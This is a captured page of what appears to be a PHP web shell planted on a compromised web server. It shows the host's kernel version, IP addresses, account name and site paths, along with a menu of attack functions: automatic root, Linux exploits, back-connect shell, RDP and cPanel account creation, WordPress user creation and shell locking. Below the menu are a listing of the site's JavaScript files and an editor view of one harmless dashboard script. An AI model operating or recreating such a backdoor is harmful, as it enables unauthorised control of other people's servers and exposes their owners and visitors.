Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.217.104.36
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
AccelCMS /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
ace-responsive-menu.js
4.59
KB
-rw-r--r--
bootstrap-select.min.js
44.06
KB
-rw-r--r--
bootstrap.min.js
58.6
KB
-rw-r--r--
chart-custome.js
4.25
KB
-rw-r--r--
chart.min.js
156.31
KB
-rw-r--r--
dashboard-script.js
1.99
KB
-rw-r--r--
google-maps.js
38.83
KB
-rw-r--r--
googlemaps1.js
2.85
KB
-rw-r--r--
googlemaps2.js
2.83
KB
-rw-r--r--
isotop.js
55.75
KB
-rw-r--r--
jquery-3.3.1.js
332.61
KB
-rw-r--r--
jquery-migrate-3.0.0.min.js
8.32
KB
-rw-r--r--
jquery-scrolltofixed-min.js
28.9
KB
-rw-r--r--
jquery.counterup.js
9.09
KB
-rw-r--r--
jquery.marquee.min.js
2.2
KB
-rw-r--r--
jquery.mmenu.all.js
23.53
KB
-rw-r--r--
parallax.js
33.07
KB
-rw-r--r--
popper.min.js
20.76
KB
-rw-r--r--
progressbar.js
5.91
KB
-rw-r--r--
script.js
30.31
KB
-rw-r--r--
script2.js
30.31
KB
-rw-r--r--
scrollto.js
6.88
KB
-rw-r--r--
simplebar.js
41.76
KB
-rw-r--r--
single-counter.js
655
B
-rw-r--r--
slider.js
116.34
KB
-rw-r--r--
smartuploader.js
749
B
-rw-r--r--
snackbar.min.js
3.31
KB
-rw-r--r--
timepicker.js
60.78
KB
-rw-r--r--
wow.min.js
8.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dashboard-script.js
//toggle between hiding and showing the dropdown content function myFunction() { document.getElementById("myDropdown").classList.toggle("show"); } // Closes dropdown window.onclick = function(event) { if (!event.target.matches('.dropbtn')) { var dropdowns = document.getElementsByClassName("dropdown-content"); var i; for (i = 0; i < dropdowns.length; i++) { var openDropdown = dropdowns[i]; if (openDropdown.classList.contains('show')) { openDropdown.classList.remove('show'); } } } } // Sidebar Menu Script $.sidebarMenu = function(menu) { var animationSpeed = 300; $(menu).on('click', 'li a', function(e) { var $this = $(this); var checkElement = $this.next(); if (checkElement.is('.treeview-menu') && checkElement.is(':visible')) { checkElement.slideUp(animationSpeed, function() { checkElement.removeClass('menu-open'); }); checkElement.parent("li").removeClass("active"); } //If the menu is not visible else if ((checkElement.is('.treeview-menu')) && (!checkElement.is(':visible'))) { //Get the parent menu var parent = $this.parents('ul').first(); //Close all open menus within the parent var ul = parent.find('ul:visible').slideUp(animationSpeed); //Remove the menu-open class from the parent ul.removeClass('menu-open'); //Get the parent li var parent_li = $this.parent("li"); //Open the target menu and add the menu-open class checkElement.slideDown(animationSpeed, function() { //Add the class active to the parent li checkElement.addClass('menu-open'); parent.find('li.active').removeClass('active'); parent_li.addClass('active'); }); } //if this isn't a link, prevent the page from being redirected if (checkElement.is('.treeview-menu')) { e.preventDefault(); } }); } $.sidebarMenu($('.sidebar-menu'))
Close